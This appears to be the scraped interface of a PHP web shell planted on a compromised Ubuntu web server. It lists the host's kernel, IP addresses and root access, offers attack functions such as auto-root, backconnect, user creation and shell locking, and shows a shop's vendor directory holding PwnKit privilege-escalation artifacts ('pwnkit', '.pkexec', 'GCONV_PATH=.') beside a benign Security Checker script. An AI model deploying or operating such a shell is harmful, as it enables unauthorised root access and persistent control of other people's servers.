Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
insepet /
tienda /
vendor /
bin /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
doctrine
51
B
-rwxrwxrwx
doctrine-dbal
66
B
-rwxrwxrwx
doctrine.php
2.15
KB
-rwxrwxrwx
minifycss
1.25
KB
-rwxrwxrwx
minifyjs
1.25
KB
-rwxrwxrwx
php-parse
5.96
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
security-checker
1.02
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : security-checker
#!/usr/bin/env php <?php /* * This file is part of the SensioLabs Security Checker. * * (c) Fabien Potencier * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ function includeIfExists($file) { if (file_exists($file)) { return include $file; } } if ((!$loader = includeIfExists(__DIR__.'/vendor/autoload.php')) && (!$loader = includeIfExists(__DIR__.'/../../autoload.php'))) { die('You must set up the project dependencies, run the following commands:'.PHP_EOL. 'curl -sS https://getcomposer.org/installer | php'.PHP_EOL. 'php composer.phar install'.PHP_EOL); } use Symfony\Component\Console\Application; use SensioLabs\Security\Command\SecurityCheckerCommand; use SensioLabs\Security\SecurityChecker; use SensioLabs\Security\Crawler; $console = new Application('SensioLabs Security Checker', SecurityChecker::VERSION); $console->add(new SecurityCheckerCommand(new SecurityChecker(new Crawler()))); $console->run();
Close